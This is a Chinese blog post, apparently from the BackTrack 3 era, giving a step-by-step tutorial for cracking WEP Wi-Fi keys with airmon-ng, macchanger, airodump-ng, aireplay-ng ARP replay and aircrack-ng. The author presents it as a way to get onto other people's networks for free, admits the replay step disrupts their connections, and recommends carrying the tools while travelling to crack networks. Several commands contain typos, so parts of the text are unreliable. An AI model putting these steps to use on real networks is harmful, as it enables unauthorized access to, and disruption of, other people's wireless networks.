下了个BT3(Back Track 3),上YouTube看了段破解WEP的视频。自己实现了一下,结果真的行了。wifi的WEP 加密真的很脆弱,不过以后看见wifi基本就可以上网囖。哈哈。
一、试验环境
1.需要一张支持在linux使用airodump ,aircrack 的无线网卡。网上很多资料,自己去找吧。
2.下载BT3 ISO 刻盘,然后从光盘启动进入 KDE BT 里面。
二、过程步骤:
1.在菜单栏的Internet 中找到 wireless assistant 并打开。里面可以看到附近的无线网络。看看有没有加密了网络。这里我只测试了WEP的加密。如果提示无找到网络,会自动关闭。需要从新检查一下你的无线网卡。
2. 接下来是开第一shell 开始输入命令啦:
1)输入 airmon-ng 返回 无线网卡列表,要看清楚哪张网卡哦!我这里是wifi0
2)airmon-ng stop wifi0
3) ifconfig wif0 down
4)macchanger -m 00:11:22:33:44:55 wifi0 修改网卡的mac地址
5)airmon-ng start wifi0 启动完成后会再次列出所有的无线网卡。有写网卡会提示继承父级的驱动。估计这里的意思是,BT3自带了破解的驱动吧。呵呵..
6)设置网卡ko了,就开始airodump啦!
输入 airodump-ng wifi0 ,成功后会出现一个列表,而且不断的有pack进出。如果无返回这个列表,就需要改一下,看看刚才上面arimon-ng列出来的网卡。然后换一个网卡来 dump。我这里是 airodump-ng ath1. 列表如果出来,就按 ctrl+C 停止。然后找到你要破解的网络的BSSID并且copy下来,还有要看清楚他的channel 和essid.
7) airodump-ng -c 要破解的channel -w wep123 –bssid 粘贴刚刚的BSSID
这里的wep123是随便输入的,后面需要用的哦。
3. 再开一个Shell输入:
1) aireplay-ng -1 -0 -a 粘贴刚刚的BSSID -h 00:11:22:33:44:55 -e 要破解的essid ath1
回车后,会返回一段东西里面有success的字样。具体是什么没太留意啦。就直接下一步了。也不知道失败是返回什么了。
2) airepaly-ng -3 -b 粘贴刚刚的BSSID -h 00:11:22:33:44:55 ath1
这里就直接arp了整个wifi网络。在wifi里面的人估计就上不了网了。所以接下来要速度点。如果里面的没人..那我就不知道会怎么样了。哈哈.因为需要截取一定量的数据包才能破解出密码。
4. 再开一个shell输入:
aircrack-ng -n 64 0b 粘贴刚刚的BSSID wep123_01.cap
这里不要这么快按回车,有两个地方需要注意的。第一是wep123_01.cap,需要确认一下名称,去home目录看看是不是这个名字。第二看看第一个shell窗口的数据包是否过W。如果都ko了,就按回车看结果吧。
key found: 后面这些就是密码啦。
三. 总结一下
WEP真的非常脆弱,但相信国内大多数wifi用的都是WEP啦。特别是家庭里面用的。下次要实现一下WPA 和 WPA-PSK 这两个环境的破解。BT3 是国外一个非常牛B的crack OS,里面集成大量的 hack tools。当出差或者去旅行的时候,最好带上一个网卡和BT3光盘。一定会有所收获的。呵呵..
另外,前段时间在武汉机场深圳机场都看到有中国电信的wifi网络。中国电信wifi是相对安全的。他不是加密的wifi。而是先让你连进wifi分配了一个公网IP给你。但是当你的数据要出去的时候,他会redirected到一个登陆页面输入帐户密码。所以…. 别想无线城的wifi了。不过估计奥运有外国hacker 想到办法破解到电信这个wifi系统的啦。
加个IPW2200的方法:http://backtrack.offensive-security.com/index.php/HCL:Wireless#IPW2200
